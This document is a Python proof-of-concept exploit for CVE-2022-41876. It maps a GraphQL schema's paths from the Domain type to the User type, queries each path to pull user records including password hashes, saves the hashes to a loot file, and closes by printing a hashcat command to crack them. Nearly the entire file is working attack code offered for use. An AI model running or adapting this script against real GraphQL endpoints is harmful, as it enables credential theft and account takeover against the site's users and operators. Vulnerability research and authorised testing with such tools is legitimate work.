"""Proof of concept script for CVE-2022-41876 (see the argparse description).

The script reads a GraphQL introspection result (from the target endpoint or
from a local JSON file), searches every field path leading from the ``Domain``
type to the ``User`` type, queries each path for the user fields (including
``passwordHash``), shows the results in a table and appends the hashes to
``./loot/hashes.txt``.
"""
import argparse
import json
import os
import sys

import requests
from R2Log import logger
from R2Log import console
from rich.table import Table
from rich.live import Live

# Define the type to search for
TARGET_TYPE = 'User'

# Fields requested for every user, in the order used by the result tuples
USER_FIELDS = ("id", "name", "login", "passwordHash", "email", "enabled", "maxLogin")

# File the recovered hashes are appended to
LOOT_FILE = "./loot/hashes.txt"

# Seconds to wait for the server before giving up on a request
REQUEST_TIMEOUT = 30


# Parse args
def parse_args():
    """Parse the command line and return the resulting namespace.

    Prints the help and exits with status 1 when no argument is given.
    """
    parser = argparse.ArgumentParser(add_help=True, description='CVE-2022-41876 POC')
    parser.add_argument('url', action='store', help='Target URL (specify the graphql endpoint)')
    # NOTE(review): this option is a boolean flag although its help text
    # mentions a number of threads, and nothing in this file reads it.
    parser.add_argument('-t', '--thread', action='store_true', help='Number of threads')
    parser.add_argument('-f', '--file', action='store', help='Local path to introspect file')

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    return parser.parse_args()


def prepare_table():
    """Create the (empty) results table with one column per user field."""
    table = Table(title="Contributor accounts found")
    columns = (
        ("Account id", "right", "cyan"),
        ("Name", "left", "cyan"),
        ("Login", "left", "cyan"),
        ("PasswordHash", "left", "red"),
        ("email", "left", "cyan"),
        ("Enabled", "left", "cyan"),
        ("maxLogin", "left", "cyan"),
    )
    for header, justify, style in columns:
        table.add_column(header, justify=justify, style=style, no_wrap=True)
    return table


def introspection_query(url, introspect):
    """Load the introspection schema and return the paths to ``TARGET_TYPE``.

    Args:
        url: GraphQL endpoint queried when no file is given.
        introspect: Optional path to a local JSON introspection result; when
            set, the endpoint is not contacted for the schema.

    Returns:
        A list of dotted paths (each starting with ``types``) leading from
        the ``Domain`` type to ``TARGET_TYPE``. The list may be empty.

    Exits the process with status 1 when the schema cannot be obtained or
    does not have the expected introspection layout.
    """
    logger.info("Retrieving data from the specified url or file")
    if introspect:
        try:
            with open(introspect, "r") as f:
                data = json.load(f)
        except FileNotFoundError:
            logger.error('The file "%s" does not exist' % introspect)
            sys.exit(1)
        except json.decoder.JSONDecodeError:
            logger.error('The file "%s" is not a correct JSON file' % introspect)
            sys.exit(1)
    else:
        try:
            r = requests.get(
                '%s?query={__schema{types{name,fields{name,type{name}}}}}' % url,
                timeout=REQUEST_TIMEOUT,
            )
        except requests.exceptions.RequestException as err:
            # Connection problems are reported like the other fatal errors
            # instead of ending in a traceback.
            logger.error("Could not connect to the specified url (%s)" % type(err).__name__)
            logger.info("url = %s" % url)
            sys.exit(1)
        if r.status_code != 200:
            logger.error("The specified url returned status code %i" % r.status_code)
            logger.info("url = %s" % url)
            sys.exit(1)
        try:
            data = r.json()
        except ValueError:
            # Every JSON decoding error raised by requests derives from
            # ValueError, whatever the installed requests version.
            logger.error("Could not retrieve any JSON file from the specified endpoint.")
            logger.info("url = %s" % url)
            sys.exit(1)

    # Get the list of all types in the schema
    try:
        types = data['data']['__schema']['types']
    except (KeyError, TypeError):
        # TypeError covers a non-dict document or a null "data" member
        types = None
    if not isinstance(types, list):
        logger.error("JSON file retrieved from specified url or file is not of the expected introspect format")
        sys.exit(1)
    logger.success("Data retrieved successfully\n")

    logger.info("Retrieving paths to users' hashes")
    # Map each type name to the names of its fields (empty list when the
    # type has no fields or the member is null/missing)
    type_fields = {
        t['name']: [f['name'] for f in (t.get('fields') or [])]
        for t in types
    }

    paths = find_paths('Domain', 'types', type_fields, types, set())
    if paths:
        logger.success("Paths retrieved successfully\n")
    else:
        logger.warning('No path from "Domain" to "%s" was found in the schema\n' % TARGET_TYPE)
    return paths


# Define a recursive function to find paths to the target type
def find_paths(current_type, current_path, type_fields, types, visited_types):
    """Return every dotted path from ``current_type`` to ``TARGET_TYPE``.

    Args:
        current_type: Name of the type being explored.
        current_path: Dotted path that led to ``current_type``.
        type_fields: Mapping of type name to the list of its field names.
        types: List of type entries from the introspection result.
        visited_types: Set of type names already seen on this branch; the
            current type is added to it, and each recursive call receives
            its own copy.

    Returns:
        A list of dotted paths; empty when the target cannot be reached.
    """
    # Check if we have already visited this type
    if current_type in visited_types:
        return []
    visited_types.add(current_type)

    # Check if we have reached the target type
    if current_type == TARGET_TYPE:
        return [current_path]

    # Unknown types and types without fields are dead ends
    field_names = type_fields.get(current_type)
    if not field_names:
        return []

    # Locate the schema entry once instead of rescanning it for every field
    type_entry = next((t for t in types if t['name'] == current_type), None)
    if type_entry is None:
        return []
    field_types = {}
    for f in type_entry.get('fields') or []:
        # setdefault keeps the first declaration of a field name
        field_types.setdefault(f['name'], (f.get('type') or {}).get('name'))

    # Recursively search for paths to the target type
    paths = []
    for field in field_names:
        next_type = field_types.get(field)
        # Fields whose type has no name in the schema cannot be followed
        if next_type is not None:
            paths.extend(find_paths(next_type, current_path + '.' + field,
                                    type_fields, types, visited_types.copy()))
    return paths


def get_user_info(data):
    """Extract user tuples from a decoded response.

    A list yields a list with one result per element. A dict holding an
    ``id`` key yields a tuple ordered like ``USER_FIELDS`` (missing fields
    become ``None``); any other non-empty dict is followed through its first
    value. Everything else yields ``None``.
    """
    if isinstance(data, list):
        return [get_user_info(elem) for elem in data]
    if isinstance(data, dict):
        if "id" in data:
            return tuple(data.get(field) for field in USER_FIELDS)
        if not data:
            return None
        return get_user_info(next(iter(data.values())))
    return None


def _iter_users(extract):
    """Yield each user tuple of a, possibly nested, get_user_info() result."""
    if isinstance(extract, tuple):
        yield extract
    elif isinstance(extract, list):
        for item in extract:
            yield from _iter_users(item)


def _fetch_json(url, query):
    """Send ``query`` to ``url``; return the decoded JSON or None on failure."""
    try:
        response = requests.get('%s?query=%s' % (url, query), timeout=REQUEST_TIMEOUT)
    except requests.exceptions.RequestException:
        return None
    if response.status_code != 200:
        return None
    try:
        return response.json()
    except ValueError:
        return None


def _text(value):
    """Return a table cell text for ``value`` (empty cell for None)."""
    return "" if value is None else str(value)


def main():
    """Run the script: find the paths, query them and report the hashes."""
    args = parse_args()
    url = args.url
    introspect = args.file

    if 'graphql' not in url:
        logger.warning('The specified url does not contain "/graphql"\n')

    table = prepare_table()

    # Find all paths to the target type starting from the domain root
    paths = introspection_query(url, introspect)
    total = len(paths)

    os.makedirs(os.path.dirname(LOOT_FILE), exist_ok=True)

    with Live(table, refresh_per_second=4, console=console) as live, \
            open(LOOT_FILE, "a+") as loot_file:
        logger.info('Retrieving hashes from found paths\n')
        found_users = set()
        errors = 0
        error_displayed = False
        for index, path in enumerate(paths):
            table.caption = " [yellow3]Request[/]: %d/%d (%3.1f%%)" % (
                index, total, round(index / total * 100, 1))

            # Turn "types.a.b" into "{a{b{<fields>}}}". Only the leading
            # "types." marker is stripped, so field names that end with
            # "types" are left intact.
            query = path.replace("types.", "{", 1)
            query = query.replace(".", "{") + "{" + ",".join(USER_FIELDS)
            query += "}" * query.count("{")

            user_data = _fetch_json(url, query)
            if user_data is None:
                errors += 1
                error_rate = round(errors / total * 100, 1)
                if error_rate > 5 and not error_displayed:
                    logger.warning("There is more than 5% error in server responses, check if the specified url is a valid graphql endpoint")
                    logger.warning("url = %s\n" % url)
                    error_displayed = True
                continue

            if "passwordHash" in str(user_data):
                for user in _iter_users(get_user_info(user_data)):
                    user_id, name, login, password_hash, email, enabled, max_login = user
                    if user_id in found_users:
                        continue
                    found_users.add(user_id)
                    # Accounts without a hash are listed but add nothing to the loot
                    if password_hash:
                        loot_file.write("%s\n" % password_hash)
                    table.add_row(str(user_id), _text(name), _text(login),
                                  _text(password_hash), _text(email),
                                  str(enabled), str(max_login))
            live.update(table)

    logger.info("It is possible to crack the hashes found with the following hashcat command:")
    console.print("{}hashcat --hash-type 3200 ./loot/hashes.txt $(fzf-wordlists){}\n".format("[bold green]", "[/bold green]"))
    console.print("{}Install {}Exegol{} or replace '$(fzf-wordlists)' with the path to your wordlist{}".format("[italic]", "[bold red]", "[/][italic]", "[/]"))


if __name__ == '__main__':
    main()